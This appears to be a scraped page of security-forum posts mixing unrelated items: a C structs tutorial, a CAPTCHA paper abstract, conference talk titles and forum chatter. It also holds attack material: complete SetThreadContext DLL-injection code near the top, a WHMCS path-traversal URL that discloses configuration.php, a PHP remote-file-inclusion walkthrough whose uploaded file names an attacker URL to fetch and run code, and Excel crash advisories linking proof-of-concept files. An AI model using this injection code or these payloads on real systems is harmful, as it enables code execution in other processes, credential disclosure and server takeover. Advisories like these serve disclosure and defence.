injection.RemoveHook(swtw_hook); injection.RemoveHook(manual_hook); Sursa: http://www.ring3circus.com/downloads/dll-injection-framework/

SetThreadContext DLL Injection by nerd | 2007/01/16 14:46 void __declspec(naked) InjectFunction() { __asm { PUSHAD MOV EAX, 0xAAAAAAAA //eventually the address of LoadLibraryA PUSH 0xBBBBBBBB //eventually the module name call EAX POPAD //vc is pissy and requires us to emit the hardcoded jump __emit 0xE9 __emit 0xCC __emit 0xCC __emit 0xCC __emit 0xCC } } void __declspec(naked) AfterFunction() { } void InjectDll( HANDLE hProc, HANDLE hThread, char *DllName ) { //hold up SuspendThread( hThread ); //get the thread context CONTEXT ThreadContext; ThreadContext.ContextFlags = CONTEXT_FULL; GetThreadContext( hThread, &ThreadContext ); //copy the function to a tmp buffer ULONG FunctionSize = (PBYTE)AfterFunction - (PBYTE)InjectFunction; PBYTE LocalFunction = new BYTE[FunctionSize]; memcpy( LocalFunction, InjectFunction, FunctionSize ); //allocate a remote buffer PBYTE InjData = (PBYTE)VirtualAllocEx( hProc, NULL, FunctionSize + strlen(DllName)+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); //fixup the tmp buff for( ULONG i = 0;i < FunctionSize-3; i++ ) { if ( *(PULONG)&LocalFunction[i] == 0xAAAAAAAA ) { *(PULONG)&LocalFunction[i] = (ULONG)GetProcAddress( GetModuleHandle( "kernel32.dll" ), "LoadLibraryA" ); } if ( *(PULONG)&LocalFunction[i] == 0xBBBBBBBB ) { *(PULONG)&LocalFunction[i] = (ULONG)InjData + FunctionSize; } if ( *(PULONG)&LocalFunction[i] == 0xCCCCCCCC ) { *(PULONG)&LocalFunction[i] = ThreadContext.Eip - ((ULONG)&InjData[i] + 4) ; } } //write the tmp buff + dll //Format: [RemoteFunction][DllName][null char] ULONG dwWritten; WriteProcessMemory( hProc, InjData, LocalFunction, FunctionSize, &dwWritten ); WriteProcessMemory( hProc, InjData + FunctionSize, DllName, strlen(DllName)+1, &dwWritten ); //set the EIP ThreadContext.Eip = (ULONG)InjData; SetThreadContext( hThread, &ThreadContext ); //resume the thread ResumeThread( hThread ); } Sursa: http://nerd.egloos.com/2940083

How Structs Really Work in C Posted by paul 16 October 2011 You don't know it yet, but you're...wrong. I'm not even going bother asking the question. Wouldn't be any point, other than to embarass you and make me look douchey...and I look douchey enough as it is. So let's just drop it -- Wait, you still want to hear the question? Seriously? Well fine. Since you're so smart, riddle me this: what's the purpose of a struct in C? Oh, what's that you say? The purpose of a struct is blah de blah blah container blah fields blah data type blah de blah blah blah blah? Yeah, guess what? You're wrong. You want to know the true purpose of a struct in C? The purpose of a struct is to confuse the hell out of programmers who've forgotten, or never learned in the first place, that in C, memory is king. How is memory king? Well, let us see... 1) In C, a struct maps to memory Let's say you want to do something with a video file. In memory, the file looks like this: It uses two bytes for the header, one byte for the video type, four bytes for the size, and 1024 bytes for the video data. Pretty easy to see how this will map to a struct, right? struct video_file{ short header; char type; int size; char data[1024]; }; You use memcpy() or a direct pointer assignment to get access to it: struct video_file v; memcpy(&v, video_loc_in_memory, sizeof(struct video_file)); size = v.size; /* or whatever */ ... struct video_file * p = video_loc_in_memory; size = p->size; /* or whatever */ Not too bad, right? Well, here's the problem: if padding bytes are involved, you could be entering a world of pain and not even know it. Many compilers insert padding bytes into the struct to ensure the fields are byte-aligned. What's worse, they often do this by default. If that happens, you could end up with a struct that, internally, looks like this: struct video_file{ char padding; /*what?!?!*/ short header; char type; char padding; /*what?!?!*/ int size; char data[1024]; }; So instead of 1031 bytes, you've got a struct that's 1033 bytes long. Surprise! Try doing a memcpy() now and see what happens! The solution is to use a compiler switch or a #pragma pack to ensure that structs are packed (i.e., no padding applied). 2) In C, structs are allowed to "run off the end" In reality, video files aren't statically sized (and they contain a hell of a lot more data than 1024 bytes!). So let's rewrite our struct in a way that's guaranteed to give a newb his or her daily dose of WTF: struct video_file2{ short header; char type; int size; char data[0]; }; A zero length array? Well, just remember: memory is king. As long as a symbol is backed by real memory, you can do what you want with it -- including running it past its boundaries (you will never see an OutOfBounds exception in C!) Example: This video uses two bytes for the header, one byte for the video type, four bytes for the size, and n bytes for the video data. This technique requires a struct pointer: struct video_file2 * p = video_loc_in_memory; for(int i=0; i<p->size; i++) p->data[i] = (char)(p->data[i] * 0.5); /* apply filter, maybe */ Note: some compilers don't allow zero-length arrays. In that case, you can use a 1-element array. Same principle applies: just overrun the end of it to suit your needs. 3) In C, you can compute an offset within a struct by committing an offense against aesthetics so grave it makes the cast of Jersey Shore look positively Fraiserish in comparison. struct s{ short x; char y; char z[100]; short thing; }; You need to get the offset of thing inside of s. What's the conventional way to go about this? Well, duh, like this: size_t offset = (size_t) &(((struct s*)0)->thing); In the immortal words of Arnold, "That's one...ugly...mudder...fu--" Yes, it's pretty gross, but remember, in C, memory is king. Pretend you've got a struct s at memory location zero. If you map it out, it looks like this: Because the struct is based at zero, the address of thing is its offset! In this case, 103 bytes. Except there's one problem, isn't there? How in the world are you supposed to dereference memory address zero? That's, like, a memory access violation waiting to happen! Well, actually...that's a trick question. Nothing gets dereferenced! (struct s*)0 casts zero to a struct s pointer. No dereferencing occurs. ((struct s*)0)->thing informs the compiler that you will be doing something with thing, but nothing happens with it at that point. No dereferencing occurs. &(((struct s*)0->thing) computes the address of thing using pointer arithmetic. It doesn't actually touch the memory, so no dereferencing occurs. Note: officially, you're supposed to use the offsetof() function to do this, but if you ever do any real C programming (i.e., embedded) you'll see this in other people's code, so you might as well get comfortable with how it works. Conclusion: Well, that was a brief rundown of how C structs interact with memory and vice-versa. I hope you found it useful, and if you have any questions, feel free to leave them in the comments. Sursa: How Structs Really Work in C | TENACIOUS C

Security token-ul trebuie sa il citesti din sursa paginii (o parsezi) dupa logare si sa il folosesti de acolo, nu cel fix, setat de tine. Se schimba la fiecare logare acel token.

Hack in Paris 2011 videos - Cyberwar-4G aka The Coming Smart Phone Wars - Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradication of XSS - Be a smart CISO: learn about people - "Project Quebec" and win32 exploit development with pvefindaddr - Offensive XSLT - Agnitio: the security code review Swiss army knife - Pentesting iPhone & iPad Applications - Skirack: ROP for masses - The forbidden image - Security impact of SVG on the WWW - A close look at rogue antivirus programs - Proactive Network Security through Vulnerability Management - Escaping Windows Sandboxes Videos: http://www.hackinparis.com/archive-2011 Majoritatea titlurilor suna foarte bine, sper ca va sunt utile.

Un scurt anunt de ordin administrativ, avem doi noi moderatori: Felicitari: - wildchild - Zatarra PS: Mai avem niste idei, ramane de vazut ce schimbari vor mai interveni.

Aplicam metoda de la Defcamp: http://i40.tinypic.com/2464aco.png

Patetici.

Network Security Tools For more than a decade, the Nmap Project has been cataloguing the network security community's favorite tools. In 2011 this site became much more dynamic, offering ratings, reviews, searching, sorting, and a new tool suggestion form. This site allows open source and commercial tools on any platform, except those tools that we maintain (such as the Nmap Security Scanner, Ncat network connector, and Nping packet manipulator). We're very impressed by the collective smarts of the security community and we highly recommend reading the whole list and investigating any tools you are unfamiliar with. Click any tool name for more details on that particular application, including the chance to read (and write) reviews. Many site elements are explained by tool tips if you hover your mouse over them. Enjoy! http://sectools.org/

A se privi acest post ca "asa nu se face". In atentia celor care au o astfel de mentalitate si astfel de dorinte, in caz ca nu aveti cont, evitati sa creati unul iar daca aveti deja unul, incercati sa pastrati "linistea".

WHMCS (clientarea.php) Local File Disclosure # Title : WHMCS (clientarea.php) Local File Disclosure # Author : Red Virus >>>c3o@w.cn # Product : WHMCS ( WHMCompleteSolution ) # Vendor : http://whmcs.com/ # Date : 11/04/2011 # Version : 3.X.x # Tested on : linux+apache # Homepage : www.alm3refh.com ================================================================ http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00 http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00 show the page source to see Disclosure file ================================================================ Greetz To . >>> alm3refh.com - tryag.cc - joood T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 infofst & virus hima & Karar aLShaMi & all alm3refh group ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA Sursa: WHMCS 3.x Local File Disclosure ? Packet Storm

Security bug in is_a function in PHP 5.3.7 / 5.3.8 Sep 23 2011 A few weeks ago we migrated a part of our hosting environment from PHP 5.3.6 to PHP 5.3.8. Normally an upgrade like this doesn’t cause any problems, since the PHP minor releases only contain bug- and security fixes. This time however, something big did change. The behaviour of the is_a function was radically altered, causing quite a few errors for clients using certain PHP/PEAR Frameworks.. We quickly reverted it, investigated the issue and discovered both the source, and alarmingly, it turned out that a big security hole was introduced. What was fixed? PHP 5.3.7 included a fix for PHP bug #53727. This fix however changed the behavior of the is_a() function, a function normally used to check if a certain variable is a child of a specific Class. The original behavior accepted all sorts of inputs as its primary argument, including strings. The old behavior was to see if this “string” was an instance of a specific Class, which it obviously wasn’t, and return false. The new behavior however, attempts to be “helpful”, and passes its first argument to the __autoload() function. And it is this exact change that caused such unexpected behavior for our customers. The problem our customers were having is that they had some (custom) code that implemented a very basic autoloader, in an attempt to reduce memory footprints by automatically loading class definitions when they were needed using the __autoload() function. Their code however never expected to be given anything other than a class name, but now all of a sudden they were receiving all sorts of objects. Take for example the following code snippet using a standard pear File library: //autoload function from http://www.php.net/manual/en/language.oop5.autoload.php function __autoload($class_name) { include $class_name . '.php'; } $uploaded_file = File::readAll($uploaded_filename); if (PEAR::isError($uploaded_file)){ print_error($uploaded_file); }else{ process_upload($uploaded_file); } Normally one wouldn’t expect the __autoload() function to be called at all here, but the PEAR::File library uses the PEAR standards and uses the PEAR::isError() call internally to check if the file was read correctly or if an error was returned. This function ends up calling the is_a function, and this ends up calling the autoloader function, which is obviously poorly equipped to handle anything but explicit classnames. As a result, even this standard piece of PHP code, using standard libraries and code snippets from the php.net site itself suddenly has its behavior changed. Instead of simply sending the uploaded file to the process_upload() function, the __autoload() function now tries to include a file that doesn’t exist and throws a giant error to the client. The problem with the new behavior Normally a BC breaking bug isn’t a huge deal. Sure, some people have some unexpected behavior, which is why the developers try and avoid breaking BC in a minor update. If any does happen people file a bug and the behavior is fixed in the next update. The same happened to this bug: PHP bug #55475 was filed and a discussion was started about whether this bug should be fixed or if the change was intended behavior. The biggest problem with this new behavior however, is not just the fact that errors are suddenly displayed. Of course this was a problem for the webmasters hosting at our servers, but the real problem lies even deeper than that… A lot of __autoload() implementations we found on our systems use the standard example from the php.net to include their classes, which doesn’t contain any sort of checks before trying to include a file. While one could argue that it’s never a good idea to simply copy example code into a live environment, this does happen more often than not, according to our scans. And it is exactly in this standard behavior that the problem lies. If we look again at the example above, it’s easy to see what happens. A file, say a JPG file, is uploaded by the user and read from the disk. The script checks to see if it read the file correctly and in doing so passes the contents of the uploaded file to the __autoload() function, that tries to load the class. Now normally the server would print an error stating “Error: “include(/var/www/domain.com/upload/.php) [function.include]: failed to open stream: No such file or directory” (error #2).”, and present this to the user. Now what if the user doesn’t upload an image file, but a carefully crafted text file with a JPEG extension. Imagine for example the following contents in the file: http://www.cracker.com/hack-me-include Now we take that file and upload it to the website. The file is read by File::readAll(), its contents returned in the $uploaded_file. We pass this variable to the PEAR::isError() function, it passes it to the __autoload() function, which blindly prepares the string to include: "http://www.cracker.com/hack-me-include" . ".php" => "http://www.cracker.com/hack-me-include.php A nice and complete URL. It feeds this to the include() function which downloads the file with code from the remote website and, eventually, executes it. At this point, you can consider your website lost, as the hacker can execute whatever code it wants on your website. He has full access to your database configuration file, your settings, your database with customer information, and everything else. The only recourse you have at this point is to restore your entire website from a known and trusted backup, change all your passwords (Both for your hosting environment, your website, and for all your customers who’s information has been exposed to the hackers. The fix Luckily there’s quite a few ways to fix it. Disable the setting allow_url_include in your PHP.ini to prevent remote file inclusion Patch your __autoload() to only include from a local dir; 1 include("./includes/" . $class_name . ".php"); Install Suhosin to protect yourself from remote file inclusion, and more. Of course, the best fix for this is to not install PHP 5.3.7 or PHP 5.3.8 untill the PHP Project has fixed this bug and reverted to the old behavior The impact The impact of this bug is relatively small. It takes quite some specific code to get your input passed all the way to the is_a/autoloader, but as the example showed it’s possible to do. I personally don’t expect to see any exploits abusing this bug, but when it comes to the security of your website, better safe than sorry. Also, for customers hosted at Byte, good news. Of course we have the allow_url_include setting turned off by default. Sursa: http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/

Microsoft Excel Use after free/Memory corruption ####################################################################### Luigi Auriemma Application: Microsoft Excel http://office.microsoft.com/en-us/excel/ http://office.microsoft.com/en-us/downloads/CD001022531.aspx Versions: tested Office 2003 11.8335.8333 SP3 Platforms: Windows Bug: use after free Exploitation: file Date: 03 Nov 2011 (found 24 Aug 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Excel 2003 is a spreadsheet program, part of the Office 2003 suite still supported by Microsoft. ####################################################################### ====== 2) Bug ====== Use-after-free probably located in the code that handles the vbscript macros: eax=00492d78 ebx=00000000 ecx=feeefeee edx=00185ff8 esi=004c72b8 edi=00492478 eip=65058591 esp=00185fd0 ebp=0018601c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 VBE6!DllVbeInit+0x40f6f: 65058591 ff11 call dword ptr [ecx] ds:002b:feeefeee=???????? 0:000:x86> k ChildEBP RetAddr 0018601c 6501c0dd VBE6!DllVbeInit+0x40f6f 00186074 6505dee2 VBE6!DllVbeInit+0x4abb 001860a8 6505e21c VBE6!DllVbeInit+0x468c0 00186220 767cbc9c VBE6!DllVbeInit+0x46bfa 00000000 00000000 ole32!StgIsStorageFile+0x764 How to replicate: - open the proof-of-concept via web or manually - "An error occurred while loading 'Module1'. Do you want to continue loading the project?" select No, if you select Yes then the bug doesn't seem to be replicable - "Unexpected error (32790)" select OK - "Excel found unreadable content in ..." Yes or No is the same - now reopen the proof-of-concept and the bug will happen immediately The reopening of the same file seems necessary probably because the Office suite uses only one instance of its programs and performs a particular reallocation of the resources when a file gets reopened. Note that I have tested only the latest version of Office 2003 on Windows 7. The proof-of-concept is NOT optimized. Modified bytes: excel_1a.xls: 0006FCA4 AA 01 excel_1b.xls: 0006FCB0 AD 40 ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/excel_1.zip ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### ####################################################################### Luigi Auriemma Application: Microsoft Excel http://office.microsoft.com/en-us/excel/ http://office.microsoft.com/en-us/downloads/CD001022531.aspx Versions: tested Office 2003 11.8335.8333 SP3 Platforms: Windows Bug: memory corruption Exploitation: file Date: 03 Nov 2011 (found 24 Aug 2011) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Excel 2003 is a spreadsheet program, part of the Office 2003 suite still supported by Microsoft. ####################################################################### ====== 2) Bug ====== Memory corruption: eax=00000000 ebx=00690066 ecx=00000de9 edx=00000de8 esi=000202ad edi=00630020 eip=30039ea2 esp=001896a8 ebp=02000814 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 Excel!Ordinal41+0x39ea2: 30039ea2 c7450800010000 mov dword ptr [ebp+8],100h ss:002b:0200081c=00690066 0:000:x86> k ChildEBP RetAddr 001896b0 30278c45 Excel!Ordinal41+0x39ea2 001896c8 30278c45 Excel!Ordinal41+0x278c45 001896e0 3070c95a Excel!Ordinal41+0x278c45 00189708 301fd1cb Excel!MdCallBack+0x27fe3e 001899f8 010300dd Excel!Ordinal41+0x1fd1cb 001899fc 00000000 0x10300dd Note that the exception can change and NO additional research has been performed. How to replicate: - open the proof-of-concept via web or manually - excel_2b.xls requires the clicking of "Open" when requested - now reopen the proof-of-concept and the bug will happen immediately The reopening of the same file seems necessary probably because the Office suite uses only one instance of its programs and performs a particular reallocation of the resources when a file gets reopened. Note that I have tested only the latest version of Office 2003 on Windows 7. The proof-of-concept is NOT optimized. Modified bytes: excel_2a.xls: 00067B5F 06 00 excel_2b.xls: 00067B63 00 7F excel_2c.xls: 00000D70 00 04 ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/excel_2.zip ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### Surse: - http://aluigi.altervista.org/adv/excel_1-adv.txt - http://aluigi.altervista.org/adv/excel_2-adv.txt

Text-based CAPTCHA Strengths and Weaknesses Elie Bursztein, Stanford University elie at cs.stanford.edu Matthieu Martin, Stanford University mamartin at stanford.edu John C. Mitchell jcm at cs.stanford.edu The slides and paper are available from free from Text-based CAPTCHA Strengths and Weaknesses - Elie Bursztein Follow Elie onTwitter : https://twitter.com/elie and Google+: http://ly.tl/g ABSTRACT We carry out a systematic study of existing visual CAPTCHAs based on distorted characters that are augmented with anti-segmentation techniques. Applying a systematic evaluation methodology to 15 current CAPTCHA schemes from popular web sites , we find that 13 are vulnerable to automated attacks. Based on this evaluation, we identify a series of recommendations for CAPTCHA designers and attackers, and possible future directions for producing more reliable human/computer distinguishers. Download: http://cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf